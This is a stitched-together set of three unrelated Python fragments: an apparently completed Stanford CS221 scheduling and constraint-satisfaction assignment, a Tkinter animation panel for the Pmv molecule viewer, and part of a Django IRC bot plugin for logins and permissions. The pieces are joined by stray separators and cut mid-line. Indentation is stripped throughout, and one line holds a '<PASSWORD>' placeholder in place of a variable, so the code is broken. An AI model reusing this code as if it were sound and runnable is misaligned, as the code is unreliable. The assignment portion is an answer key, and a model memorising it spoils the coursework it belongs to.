# Hint: for ties, choose the variable with lowest index in self.csp.variables
# BEGIN_YOUR_CODE (our solution is 7 lines of code, but don't worry if you deviate from this)
mcv = (float('inf'), None)
for var in self.csp.variables:
if var in assignment:
continue
consistency = (sum([1 for val in self.domains[var] if self.get_delta_weight(assignment, var, val) > 0]), var)
mcv = min(mcv, consistency)
return mcv[1]
# END_YOUR_CODE
def apply_arc_consistency(self, var) -> None:
"""
Perform the AC-3 algorithm. The goal is to reduce the size of the
domain values for the unassigned variables based on arc consistency.
@param var: The variable whose value has just been set.
"""
def remove_inconsistent_values(var1, var2):
removed = False
# the binary factor must exist because we add var1 from var2's neighbor
factor = self.csp.binaryFactors[var1][var2]
for val1 in list(self.domains[var1]):
# Note: in our implementation, it's actually unnecessary to check unary factors,
# because in get_delta_weight() unary factors are always checked.
if (self.csp.unaryFactors[var1] and self.csp.unaryFactors[var1][val1] == 0) or \
all(factor[val1][val2] == 0 for val2 in self.domains[var2]):
self.domains[var1].remove(val1)
removed = True
return removed
queue = [var]
while len(queue) > 0:
curr = queue.pop(0)
for neighbor in self.csp.get_neighbor_vars(curr):
if remove_inconsistent_values(neighbor, curr):
queue.append(neighbor)
def create_sum_variable(csp: CSP, name: str, variables: List, maxSum: int) -> tuple:
"""
Given a list of |variables| each with non-negative integer domains,
returns the name of a new variable with domain range(0, maxSum+1), such that
it's consistent with the value |n| iff the assignments for |variables|
sums to |n|.
@param name: Prefix of all the variables that are going to be added.
Can be any hashable objects. For every variable |var| added in this
function, it's recommended to use a naming strategy such as
('sum', |name|, |var|) to avoid conflicts with other variable names.
@param variables: A list of variables that are already in the CSP that
have non-negative integer values as its domain.
@param maxSum: An integer indicating the maximum sum value allowed. You
can use it to get the auxiliary variables' domain
@return result: The name of a newly created variable with domain range
[0, maxSum] such that it's consistent with an assignment of |n|
iff the assignment of |variables| sums to |n|.
"""
result = ('sum', name, 'aggregated')
csp.add_variable(result, list(range(maxSum + 1)))
if len(variables) == 0:
csp.add_unary_factor(result, lambda x: x == 0)
return result
domain = []
for i in range(maxSum + 1):
for j in range(i, maxSum + 1):
domain.append((i, j))
for i in range(len(variables)):
csp.add_variable(('sum', name, str(i)), domain)
csp.add_unary_factor(('sum', name, '0'), lambda x: x[0] == 0)
for i in range(len(variables)):
f = ('sum', name, str(i))
csp.add_binary_factor(f, variables[i], lambda x, y: x[1] == x[0] + y)
for i in range(len(variables) - 1):
f0 = ('sum', name, str(i))
f1 = ('sum', name, str(i + 1))
csp.add_binary_factor(f0, f1, lambda x, y: x[1] == y[0])
csp.add_binary_factor(('sum', name, str(len(variables) - 1)), result, lambda x, y: x[1] == y)
return result
############################################################
# Problem 2
# A class providing methods to generate CSP that can solve the course scheduling
# problem.
class SchedulingCSPConstructor:
def __init__(self, bulletin: CourseBulletin, profile: Profile):
"""
Saves the necessary data.
@param bulletin: Stanford Bulletin that provides a list of courses
@param profile: A student's profile and requests
"""
self.bulletin = bulletin
self.profile = profile
def add_variables(self, csp: CSP) -> None:
"""
Adding the variables into the CSP. Each variable, (request, quarter),
can take on the value of one of the courses requested in request or None.
For instance, for quarter='Aut2013', and a request object, request, generated
from 'CS221 or CS246', (request, quarter) should have the domain values
['CS221', 'CS246', None]. Conceptually, if var is assigned 'CS221'
then it means we are taking 'CS221' in 'Aut2013'. If it's None, then
we are not taking either of them in 'Aut2013'.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter in self.profile.quarters:
csp.add_variable((request, quarter), request.cids + [None])
def add_bulletin_constraints(self, csp: CSP) -> None:
"""
Add the constraints that a course can only be taken if it's offered in
that quarter.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter in self.profile.quarters:
csp.add_unary_factor((request, quarter), \
lambda cid: cid is None or \
self.bulletin.courses[cid].is_offered_in(quarter))
def add_norepeating_constraints(self, csp: CSP) -> None:
"""
No course can be repeated. Coupling with our problem's constraint that
only one of a group of requested course can be taken, this implies that
every request can only be satisfied in at most one quarter.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter1 in self.profile.quarters:
for quarter2 in self.profile.quarters:
if quarter1 == quarter2:
continue
csp.add_binary_factor((request, quarter1), (request, quarter2), \
lambda cid1, cid2: cid1 is None or cid2 is None)
def get_basic_csp(self) -> CSP:
"""
Return a CSP that only enforces the basic constraints that a course can
only be taken when it's offered and that a request can only be satisfied
in at most one quarter.
@return csp: A CSP where basic variables and constraints are added.
"""
csp = CSP()
self.add_variables(csp)
self.add_bulletin_constraints(csp)
self.add_norepeating_constraints(csp)
return csp
def add_quarter_constraints(self, csp: CSP) -> None:
"""
If the profile explicitly wants a request to be satisfied in some given
quarters, e.g. Aut2013, then add constraints to not allow that request to
be satisfied in any other quarter. If a request doesn't specify the
quarter(s), do nothing.
@param csp: The CSP where the additional constraints will be added to.
"""
# Problem 2a
# Hint: If a request doesn't specify the quarter(s), do nothing.
# Hint: To check which quarters are specified by a request variable
# named `request`, use request.quarters (NOT self.profile.quarters).
# BEGIN_YOUR_CODE (our solution is 5 lines of code, but don't worry if you deviate from this)
for request in self.profile.requests:
if len(request.quarters) == 0:
continue
for quarter in self.profile.quarters:
if quarter not in request.quarters:
csp.add_unary_factor((request, quarter), lambda cid: cid is None)
# END_YOUR_CODE
def add_request_weights(self, csp: CSP) -> None:
"""
Incorporate weights into the CSP. By default, a request has a weight
value of 1 (already configured in Request). You should only use the
weight when one of the requested course is in the solution. A
unsatisfied request should also have a weight value of 1.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in | |
import os, weakref
import Tkinter, Pmw
from Scenario2.gui.Tk.clipboard import ClipboardGUI
from Scenario2.sequenceAnimator import SequenceAnimator
from Scenario2.gui.Tk.sequenceAnimator import SequenceAnimatorGUI
from Scenario2 import _clipboard, _MAATargets
from DejaVu.scenarioInterface.animationGUI import orientationGUI
from DejaVu.scenarioInterface.animationPanels import AnimationPanel, ShowHideGeomPanel
from Pmv.scenarioInterface.animations import PmvColorObjectMAA, PartialFadeMolGeomsMAA,colorCmds
from Pmv.scenarioInterface.GeomChooser import PmvGeomChooser, PmvSetChooser
from DejaVu.GeomChooser import GeomChooser
from mglutil.gui.BasicWidgets.Tk.colorWidgets import ColorChooser
from mglutil.util.callback import CallbackFunction
from Pmv.moleculeViewer import MoleculeViewer
from DejaVu.scenarioInterface.animationGUI import SESp_MAAEditor
class SESpOpSet_MAAEditor(SESp_MAAEditor):
"""
Editor providing speed, easeInOut,sortPoly , Opacity and Pmv set chooser parameters
"""
def __init__(self, master=None, title='Partial Fade Editor',
buttons=['OK', 'Preview', 'Cancel'],
defaultButton='OK', speedDict=None, pmv=None):
self.pmv = pmv
self.fadeType = "in"
self.destOpacVal = 1.0
SESp_MAAEditor.__init__(
self, master=master, title=title, buttons=buttons,
defaultButton=defaultButton, speedDict=speedDict)
def populateForm(self):
"""
add set chooser
"""
SESp_MAAEditor.populateForm(self)
frame = self.dialog.interior()
grp = Pmw.Group(frame, tag_text='Fade options')
parent = grp.interior()
self.fadeTypeW = ft = Pmw.RadioSelect(
parent, labelpos="w", label_text="Fade:",
selectmode='single', orient='horizontal',
buttontype='radiobutton',
command=self.setFadeType_cb)
for text in ['in', 'out']:
ft.add(text)
ft.setvalue(self.fadeType)
ft.pack(side = 'left', anchor = 'w', fill = 'x',
expand = 1, padx = 8, pady = 8)
self.destOpac = Pmw.Counter(parent, labelpos = 'w',
label_text = 'Final opacity:',
entry_width = 8, entryfield_value = self.destOpacVal,
datatype = {'counter' : 'real'}, increment = 0.1,
entryfield_validate = {'validator' : 'real',
'min' : 0.0 , 'max':1.0})
self.destOpac.pack(side = 'top', anchor = 'w', fill = 'x', expand = 1, padx = 8, pady = 8)
grp.pack(side='top', fill='x', expand=1 )
self.setChooser = PmvSetChooser(frame, self.pmv,
title = "select a set:",
mode="multiple")
self.setChooser.pack(side = "top", expand=1, fill="both")
self.balloon.bind(self.setChooser.widget, "fade in/out parts of a molecule for geometries\nwhere the atom centers correspond to the geometry\nvertices (cpk, sticks, balls, bonded)" )
def setFadeType_cb(self, fadeType="in", val = None):
entry = self.destOpac._counterEntry
if fadeType == "in":
entry.delete(0, 'end')
if val == None: val = 1.0
entry.insert(0, val)
else:
entry.delete(0, 'end')
if val == None: val = 0.0
entry.insert(0, val)
self.fadeType = fadeType
def setValues(self, **kw):
"""
take a dictionary of p <arameterName:parameterValues set the editor
to these values
"""
SESp_MAAEditor.setValues(self, **kw)
if self.maa:
fade = "in"
if hasattr(self.maa, 'fade'):
fade = self.maa.fade
self.fadeTypeW.setvalue(fade)
destVal = None
if hasattr(self.maa, 'destValue'):
destVal = self.maa.destValue
self.setFadeType_cb(fadeType=fade, val = destVal)
def getValues(self):
"""
return a dictionary of parameterName:parameterValues
"""
values = SESp_MAAEditor.getValues(self)
values['nodes'] = self.setChooser.getNodes()
self.destOpacVal = values['destValue'] = float(self.destOpac.get())
values['fade'] = self.fadeType
return values
class colorsMAAGUI(AnimationPanel):
""" Adds color effects buttons."""
def __init__(self, pmv ,master=None):
assert isinstance(pmv, MoleculeViewer)
vi = pmv.GUI.VIEWER
self.pmv = pmv
AnimationPanel.__init__(self, vi, 'pmv.GUI.VIEWER', master)
gc = self.geomChooser = PmvGeomChooser(pmv, root=self.geomChooserG.interior(),
showAll=False, refreshButton=True, showAllButton=True,
command=self.onSelect_cb)
gc.pack(side='top', fill='both', expand=1, anchor="w")
# select 'All' entry by default
gc.chooserW.lb.select_set(0)
self.selectedGeom = [ [0], [pmv.GUI.VIEWER.rootObject]]
# add action creating buttons
parent = self.makeActionsG.interior()
self.colorClips = {}
for lastRow, txt in enumerate(colorCmds.keys()):
#if txt == "choose color": continue
cb = CallbackFunction(self.makeMAA, PmvColorObjectMAA, (), {'pmv':pmv, 'colortype':txt})
w = Tkinter.Button(parent, text=txt, command=cb)
w.grid(column=0, row=lastRow, columnspan = 2, sticky='ew')
w.bind('<Button-3>', CallbackFunction( self.showMaaEditor_cb, PmvColorObjectMAA, (), {'pmv':pmv, 'colortype':txt}) )
self.lastRow = lastRow
def getSelectedGeoms(self):
gc = self.geomChooser
geometries = gc.get()
kw = {}
if len(geometries):
# get the name of the currently selected geometry
en = gc.chooserW.entries
ind = gc.chooserW.getInd()[0]
objname= en[ind][0].strip() # remove leading blanks
# build a name
gparent = geometries[0].parent
if gparent is not None and gparent.name != "root":
objname = gparent.name + "|" + objname
kw['objectName'] = objname
if hasattr(gc, "getNodes"):
kw['nodes'] = gc.getNodes()
return geometries, kw
def showMaaEditor_cb(self, maaClass, args, kw, event=None):
"""
open maa editor, create maa based on specified options
"""
geometries, geomkw = self.getSelectedGeoms()
if len(geometries)==0:
from tkMessageBox import showwarning
showwarning("Warning", 'No geometry selected',
parent = self.geomChooser.root)
return
kw.update(geomkw)
args = (geometries, )
maa = maaClass( *args, **kw )
if not len(maa.actors):
return
st = self.editMAA_cb(maa)
if st == "OK":
self.makeMAAButton(maa)
def makeMAA(self, maaClass, args, kw, event=None):
"""
callback for action creating buttons
"""
gc = self.geomChooser
geometries = gc.get()
if len(geometries)==0:
from tkMessageBox import showwarning
showwarning("Warning", 'No geometry selected',
parent = gc.root)
return
# get the name of the currently selected geometry
en = gc.chooserW.entries
ind = gc.chooserW.getInd()[0]
objname= en[ind][0].strip() # remove leading blanks
# build a name
gparent = geometries[0].parent
if gparent is not None and gparent.name != "root":
objname = gparent.name + "|" + objname
kw['objectName'] = objname
if hasattr(gc, "getNodes"):
kw['nodes'] = gc.getNodes()
args = (geometries, )
maa = maaClass( *args, **kw )
if len(maa.actors):
self.makeMAAButton(maa)
def onSelect_cb(self, event = None):
self.selectedGeom = [self.geomChooser.chooserW.getInd(),
self.geomChooser.chooserW.get()]
class movePmvObjectsMAAGUI(ShowHideGeomPanel):
def __init__(self, pmv, master=None):
assert isinstance(pmv, MoleculeViewer)
from Pmv.GeomFilter import GeomFilter
self.gf = GeomFilter(pmv)
filterFunction = self.gf.filter
vi = pmv.GUI.VIEWER
kw = {'showAll':False, 'filterFunction':filterFunction,
'refreshButton':True, 'showAllButton': True}
gcOpt = [ (), kw ]
ShowHideGeomPanel.__init__(
self, vi, 'pmv.GUI.VIEWER', GeomChooser, gcOpt, master=master)
self.lastRow += 1
# select 'All' entry by default
gc = self.geomChooser
gc.chooserW.lb.select_set(0)
self.selectedGeom = [ [0], [vi.rootObject]]
frame = self.effectsContainer
# partial fade in button
cb = CallbackFunction(self.makeMAA, PartialFadeMolGeomsMAA,
(gc,), {'pmv':pmv})
parent = self.makeActionsG.interior()
w = self.pfadeB = Tkinter.Button(parent, text='Partial fade',
command=cb)
w.grid(column=0, row=self.lastRow, sticky='ew')
w.bind('<Button-3>', CallbackFunction( self.showMaaEditor_cb, PartialFadeMolGeomsMAA, (), {'pmv':pmv}))
import tkFileDialog
class AnimationNotebook:
def __init__(self, pmv, master=None):
"""
Create a Notebook widget. Pages contain different animation effects such
as Fly In/Out , Fade In/Out, Rotate object, Color effects.
There are a Clipping board and Sequence animator pages.
"""
self.master = master
if master is None:
self.master = master = Tkinter.Toplevel()
self.ownsMaster = True
else:
self.ownsMaster = False
self.pmv = pmv
vi = self.viewer = pmv.GUI.VIEWER
sf = Pmw.ScrolledFrame(self.master, horizflex='expand',vertflex='expand',vscrollmode='dynamic', hscrollmode='dynamic')
sf.pack(fill = 'both', expand = 1)
self.master = sf.interior()
# create menu bar
self.mBar = Tkinter.Frame(self.master, relief=Tkinter.RAISED, borderwidth=2)
self.menuButtons = {}
File_button = Tkinter.Menubutton(self.mBar, text='File', underline=0)
File_button.menu = Tkinter.Menu(File_button)
File_button['menu'] = File_button.menu
File_button.pack(side=Tkinter.LEFT, padx="1m")
File_button.menu.add_command(label='Load animation script', underline=0,
#accelerator='(Ctrl-o)',
command=self.loadAnimation)
## File_button.menu.add_command(label='Save animation script', underline=0,
## #accelerator="(Ctrl-s)",
## command=self.saveAnimation)
File_button.menu.add_command(label='Load Snapshots', underline=0,
#accelerator='(Ctrl-o)',
command=self.loadSnapshotsFromFile)
## File_button.menu.add_command(label='Save Snapshots', underline=0,
## #accelerator="(Ctrl-s)",
## command=self.saveSnapshotsToFile)
self.mBar.pack(side='top',fill=Tkinter.X, expand=1)
# create notebook widget:
self.showHidePanel = None
self.colorsGUI = None
nb = self.notebook = Pmw.NoteBook(self.master, raisecommand = self.selectPage_cb)
# add "Snapshot" page
self.orientP = nb.add("Snapshots")
self.orientGUI = orientationGUI(vi, 'viewer', master=self.orientP)
self.orientGUI._animNB = weakref.ref(self)
# add "Move" page ( add fly and fade, show/hide, rotate effects):
panel = nb.add("Move")
self.showHidePanel = movePmvObjectsMAAGUI(pmv, master=panel)
self.showHidePanel._animNB = weakref.ref(self)
# add "Colors" page
panel = nb.add("Colors")
self.colorsGUI = colorsMAAGUI(pmv, master=panel)
self.colorsGUI._animNB = weakref.ref(self)
# add clipboard
#self.clipbP = nb.add("Clipboard")
#cbgui = self.clipboardGUI = ClipboardGUI(_clipboard, master=self.clipbP)
#_MAATargets.addAnimator('Clipboard', _clipboard, self.addMaaToClipboard)
#cbgui.master.withdraw()
#cbgui.master.protocol('WM_DELETE_WINDOW', cbgui.master.withdraw )
# add sequence animator page
self.sequenceP = nb.add("Sequence Anim.")
self.addSequenceAnim()
nb.pack(padx=5, pady = 5, fill=Tkinter.BOTH, expand=1)
nb.setnaturalsize()
self.balloon = Pmw.Balloon(self.master)
self.loadedMaas = {}
def addSequenceAnim(self):
self.seqAnim = SequenceAnimator()
self.seqAnim._animNB = weakref.ref(self)
_MAATargets.addAnimator('animation', self.seqAnim, self.seqAnim.addMaa_cb)
self.seqAnimGUI = SequenceAnimatorGUI(self.seqAnim, master=self.sequenceP)#, master = frame)
def addMaaToClipboard(self, clipboard, maa):
_clipboard.addMaa(maa)
def selectPage_cb(self, pagename):
"""Called when a new page is selected. Updates the Geometry Chooser widgets
on 'Move' and 'Colors' pages."""
gc = None
pageGUI = None
if pagename == "Move":
if self.showHidePanel:
pageGUI = self.showHidePanel
gc = pageGUI.geomChooser
elif pagename == "Colors":
if self.colorsGUI:
pageGUI = self.colorsGUI
gc = pageGUI.geomChooser
if gc is not None:
gc.updateList()
if pageGUI.selectedGeom:
gind, geom = pageGUI.selectedGeom
if len(gind):
n = gind[0]
if len(gc.geomList)>= n+1 and geom == gc.geomList[n][1]:
gc.chooserW.clearSelection()
gc.chooserW.selectItem(n)
else:
gc.chooserW.clearSelection()
def saveAnimation(self, file = None, savesession=False):
# save maas in the Sequence Anim. to a file
if not len(self.seqAnim.maas):
return
filename = file
if not file:
ans, filename, savesession = self.openSaveDialog()
if ans == "OK":
if filename:
file = filename + "_animation.py"
if file:
# save animation to file filename_animation.py
lines = """import sys\n"""
lines += """viewer=pmv.GUI.VIEWER \n"""
lines += self.seqAnim.getMAASourceCode("animator")
f = open(file, 'w')
f.writelines(lines)
f.close()
# save current Pmv session
if savesession:
self.pmv.saveSession(filename+"_session.psf")
def openSaveDialog(self, title = 'Save Animation', fileext = "_animation"):
dialog = Pmw.Dialog(self.master, buttons = ('OK','Cancel'),
defaultbutton = 'OK', title=title)
dialog.withdraw()
savesession = Tkinter.IntVar()
savesession.set(1)
frame = dialog.interior()
checkb = Tkinter.Checkbutton(frame, text = "Save Pmv Session",
variable=savesession)
checkb.pack(side='top', anchor='w')
entry = Pmw.EntryField(frame, label_text="File name:", labelpos='w')
entry.pack(expand = 1, fill = 'both', padx = 4, pady = 4, side='left')
self.balloon.bind(entry, "Enter a filename.\nfilename%s.py and filename_session.psf\nwill be created" % | |
# test plugin
import re
import os
import json
import types
import django
from django.contrib.auth.models import User
from logos.models import NetworkPlugins, RoomPlugins
from django.contrib.auth import authenticate
from guardian.shortcuts import assign_perm, get_perms, remove_perm
import twisted
from git import Repo
import sys
import types
from logos.constants import VERSION
from bot.logos_decorators import irc_room_permission_required, \
irc_network_permission_required
from logos.roomlib import get_room_option, get_global_option
from bot.pluginDespatch import Plugin
from logos.roomlib import get_room_option, set_room_option, set_room_defaults,\
set_global_option, get_user_option
import logging
from django.conf import settings
from logos.models import Settings, NetworkPermissions, RoomPermissions
logger = logging.getLogger(__name__)
logging.config.dictConfig(settings.LOGGING)
class SystemCoreCommands(Plugin):
plugin = ("system", "System Module")
system = True
def __init__(self, *args):
super(SystemCoreCommands, self).__init__(*args)
self.commands = ( \
(r'ping', self.ping, 'ping the bot'),
(r'login\s+(?P<password>\S+)$', self.login, 'Login into the bot'),
(r'login\s+(?P<userid>\S+)\s+(?P<password>\S+)$', self.login, 'Login into the bot'),
(r'logout', self.logout, "Log out of bot"),
(r'version\s*$', self.version, "Show this bot's version info"),
(r'help\s*$', self.help, "Show this bot's help info"),
(r'list\s+plugins$', self.list_plugins, "list all plugins available"),
(r'list\s+plugins for (?P<room>#\S+)$', self.list_plugins_for_room, "list all plugins available"),
(r'enable\s+plugin\s+(?P<room>#\S+)\s+(?P<plugin>[a-z0-9_-]+)',
self.enable_plugin, "Enable specified plugin for room"),
(r'disable\s+plugin\s+(?P<room>#\S+)\s+(?P<plugin>[a-z0-9_-]+)',
self.disable_plugin, "Disable specified plugin for room"),
(r'activate\s+plugin\s+(?P<plugin>[a-z0-9_-]+)',
self.activate_plugin, "Enable specified plugin for room"),
(r'deactivate\s+plugin\s+(?P<plugin>[a-z0-9_-]+)',
self.deactivate_plugin, "Disable specified plugin for room"),
(r'list\s+(?:perms|permissions)', self.list_perms, "list all permissions available"),
(r'add\s+user\s+(?P<username>\S+)\s+(?P<email>[a-zA-Z0-9-]+@[a-zA-Z0-9\.-]+)\s+(?P<password>\S+)$'),
(r'delete\s+user\s+(?P<username>\S+)$',
self.deluser, 'Delete user from system'),
(r'add\s+user\s+(?P<username>\S+)\s+(?P<email>[a-zA-Z0-9-]+@[a-zA-Z0-9\.-]+)\s+(?P<password>\S+)$',
self.adduser, 'Add user to system'),
(r'debug\s+users', self.debugusers, 'Debug list users in system'),
(r'list\s+users', self.listusers, 'List users in system'),
(r'assign\s+(?:perm|permission)\s+(?P<perm>[a-z_]+)\s+to\s+(?P<username>[^\s]+)', self.assign_net_perms, "assign permission to username"),
(r'assign\s+(?:perm|permission)\s+(?P<room>#\S+)\s+(?P<perm>[a-z_]+)\s+to\s+(?P<username>[^\s]+)', self.assign_room_perms, "assign permission to username"),
(r'unassign\s+(?:perm|permission)\s+(?P<perm>[a-z_]+)\s+from\s+(?P<username>[^\s]+)', self.unassign_net_perms, "assign permission to username"),
(r'unassign\s+(?:perm|permission)\s+(?P<room>#\S+)\s+(?P<perm>[a-z_]+)\s+from\s+(?P<username>[^\s]+)', self.unassign_room_perms, "assign permission to username"),
(r'(?:perms|permissions)\s+(?P<username>[^\s]+)', self.perms, "list permissions for user"),
(r'join\s+room\s+(?P<room>#\S+)', self.join_room,
"Request bot to join a room"),
(r'part\s+room\s+(?P<room>#\S+)', self.part_room,
"Request bot to part a room"),
(r'cmd\s+(.*)', self.cmd, "Have bot perform an IRC command"),
(r'say\s+(?P<room>#\S+)\s+(.*)', self.speak, "Say something into a room"),
(r'act\s+(?P<room>#\S+)\s+(.*)', self.action, "perform a /me action in room"),
(r'set\s+(?P<room>#\S+)\s+(?:activation|trigger)\s+\"(.)\"', self.set_trigger,
"Set the trigger used by the bot"),
(r'set\s+(?:pvt|private)\s+(?:activation|trigger)\s+\"(.)\"', self.set_pvt_trigger,
"Set the trigger used by the bot"),
(r'set\s+(?P<room>#\S+)\s+greet\s+message\s+\"(.*)\"', self.set_greet,
"Set the autogreet message"),
(r'set\s+password\s+(\S+)$', self.set_password, "Set your password"),
(r'nick\s+(?P<nick>[a-zA-Z0-9-_]+)', self.set_nick, "Set the bot nick"),
(r'actual\s+server\s*$', self.actual_host, "Set the bot nick"),
)
def privmsg(self, user, channel, message):
what_triggers_rgx = re.search("what are (?:the|your) triggers", message, re.I)
if what_triggers_rgx:
chan = channel.lower()
nick, _ = user.split('!')
# determine the trigger for this room
room_trigger = get_room_option(self.factory.network, channel, 'activation')
pvt_trigger = get_global_option('pvt-trigger')
if not pvt_trigger: pvt_trigger = "!"
user = self.get_auth().get_user_obj(nick)
user_trigger = get_user_option(user, "trigger")
if user_trigger:
msg = "Room trigger is {} private windows trigger is {} Your personal user trigger is {}".format(room_trigger,pvt_trigger, user_trigger)
else:
msg = "Room trigger is {} private windows trigger is {}".format(room_trigger,pvt_trigger)
self.say(chan, msg)
def ping(self, regex, chan, nick, **kwargs):
self.say(chan, "pong")
def actual_host(self, regex, chan, nick, **kwargs):
self.say(chan, "Actual IRC server is {}".format(self.irc_conn.actual_host))
def list_plugins(self, regex, chan, nick, **kwargs):
self.notice(nick, "=== Plugins ===")
self.notice(nick, " === Enabled ===")
for net_plugin in NetworkPlugins.objects.filter(network=self.network,\
loaded=True):
plugin_name = net_plugin.plugin.name
descr = net_plugin.plugin.description
enabled = net_plugin.enabled
if enabled:
self.notice(nick, " {0:.<15} {1:.<30}".format(plugin_name, descr))
self.notice(nick, " === Disabled ===")
for net_plugin in NetworkPlugins.objects.filter(network=self.network,\
loaded=True):
plugin_name = net_plugin.plugin.name
descr = net_plugin.plugin.description
enabled = net_plugin.enabled
if not enabled:
self.notice(nick, " {0:.<15} {1:.<30}".format(plugin_name, descr))
def list_plugins_for_room(self, regex, chan, nick, **kwargs):
room = regex.group('room')
#room = chan.lower()
if not self.get_auth().is_authorised(nick, room, 'enable_plugins'):
self.notice(nick, "You are not authorised (or logged in) for this room.")
return
self.notice(nick, " === Enabled plugins for room {} ===".format(room))
for plugin in RoomPlugins.objects.filter(net__loaded = True,
net__enabled = True,
room = chan.lower(),
net__network=self.network):
name = plugin.net.plugin.name
descr = plugin.net.plugin.description
enabled = plugin.enabled
self.notice(nick, " {0:.<15} {1}".format(name, enabled))
last_room = room
self.notice(nick, "*** End of List ***")
@irc_room_permission_required('enable_plugins')
def enable_plugin(self, regex, chan, nick, **kwargs):
room = regex.group('room')
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).enable_plugin(room, plugin_name):
self.say(chan, "plugin enabled successfully")
else:
self.say(chan, "plugin could not be enabled")
@irc_room_permission_required('enable_plugins')
def disable_plugin(self, regex, chan, nick, **kwargs):
room = regex.group('room')
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).disable_plugin(room, plugin_name):
self.say(chan, "plugin disabled successfully")
else:
self.say(chan, "plugin could not be disabled")
@irc_network_permission_required('activate_plugins')
def activate_plugin(self, regex, chan, nick, **kwargs):
plugin_name = re.sub('-','_',regex.group('plugin'))
response = super(SystemCoreCommands, self).activate_plugin(plugin_name)
if type(response) == types.TupleType:
enabled, msg = response
else:
enabled = response
msg = None
if enabled:
self.say(chan, "plugin activated successfully")
else:
self.say(chan, "plugin could not be activated")
if msg:
self.say(chan, "Reason: "+msg)
@irc_network_permission_required('activate_plugins')
def deactivate_plugin(self, regex, chan, nick, **kwargs):
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).deactivate_plugin(plugin_name):
self.say(chan, "plugin disabled at network level successfully")
else:
self.say(chan, "plugin could not be disabled")
@irc_network_permission_required('bot_admin')
def deluser(self, regex, chan, nick, **kwargs):
username = regex.group('username')
try:
user = User.objects.get(username__iexact = username.lower())
except User.DoesNotExist:
self.msg(chan, "User with that username could not be found")
else:
user.delete()
self.msg(chan, "User deleted from database ")
@irc_network_permission_required('bot_admin')
def adduser(self, regex, chan, nick, **kwargs):
username = regex.group('username')
password = <PASSWORD>.group('password')
email = regex.group('email')
try:
user = User.objects.get(username__iexact = username.lower())
except User.DoesNotExist:
user = User(username = username.lower(), email = email)
user.set_password(password)
user.save()
self.msg(chan, "User successfully created")
else:
self.msg(chan, "User already exists in database")
def debugusers(self, regex, chan, nick, **kwargs):
users = self.get_auth().users
for user in users:
self.say(chan, str(user))
self.say(chan, '*** end of debug users ***')
@irc_network_permission_required('bot_admin')
def listusers(self, regex, chan, nick, **kwargs):
self.notice(nick, "List of users....")
for user in User.objects.all():
self.notice(nick, "{} {}".format(user.username, user.email))
self.notice(nick, "==== End of User List =====")
def login(self, regex, chan, nick, **kwargs):
try:
userid = regex.group('userid')
except IndexError:
userid = None
password = regex.group('password')
host = self.get_host(nick)
try:
if userid:
user = User.objects.get(username__iexact = userid.lower())
else:
user = User.objects.get(username__iexact = nick.lower())
except User.DoesNotExist:
self.say(chan, "Invalid Nick")
return
if user.check_password(password):
self.get_auth().add(nick, host, user)
self.say(chan, "Login successful")
self.signal("login", {"nick":nick, "user":user })
else:
self.say(chan, "Login failed")
def logout(self, regex, chan, nick, **kwargs):
username = self.get_auth().get_username(nick)
self.get_auth().remove(nick)
self.say(chan, "Logged out")
self.signal("logout", {"nick":nick, "username":username })
def list_perms(self, regex, chan, nick, **kwargs):
self.notice(nick, "=== Network Permissions ===")
perm_str = ", ".join([p for p,_ in NetworkPermissions._meta.permissions])
self.notice(nick, perm_str)
self.notice(nick, "=== Room Permissions ===")
perm_str = ", ".join([p for p,_ in RoomPermissions._meta.permissions])
self.notice(nick, perm_str)
def perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
# if user is bot_admin or if user is inquiring about themself...
if self.get_auth().is_authorised(nick, '#', 'bot_admin') or \
(username == nick.lower() and self.get_auth().is_authenticated(nick)):
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.notice(nick, "Unknown user")
return
self.notice(nick, "=== Network Permissions ===")
for net_obj in NetworkPermissions.objects.all():
perms = get_perms(user, net_obj)
self.notice(nick, "{} {}".format(net_obj.network,
", ".join(perms)))
last_perms = None
for room_obj in RoomPermissions.objects.all():
perms = get_perms(user, room_obj)
if perms:
if last_perms == None:
self.notice(nick, "\n=== Room Permissions ===")
self.notice(nick, "{} {} {}".format(room_obj.network,
room_obj.room,
", ".join(perms)))
else:
self.msg(chan, "You are not authorised or not logged in")
@irc_network_permission_required('bot_admin')
def assign_net_perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in NetworkPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = NetworkPermissions.objects.get(network=self.network)
except NetworkPermissions.DoesNotExist:
perm_obj = NetworkPermissions(network=self.network)
perm_obj.save()
break
if perm_obj:
assign_perm(permission, user, perm_obj)
self.say(chan, "Permission assigned successfully")
else:
self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def unassign_net_perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in NetworkPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = NetworkPermissions.objects.get(network=self.network)
except NetworkPermissions.DoesNotExist:
perm_obj = NetworkPermissions(network=self.network)
perm_obj.save()
break
if perm_obj:
remove_perm(permission, user, perm_obj)
self.say(chan, "Permission removed successfully")
else:
self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def assign_room_perms(self, regex, chan, nick, **kwargs):
room = regex.group('room')
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in RoomPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = RoomPermissions.objects.get(network=self.network, room=room.lower())
except RoomPermissions.DoesNotExist:
perm_obj = RoomPermissions(network=self.network, room=room.lower())
perm_obj.save()
break
if perm_obj:
assign_perm(permission, user, perm_obj)
self.say(chan, "Permission assigned successfully")
else:
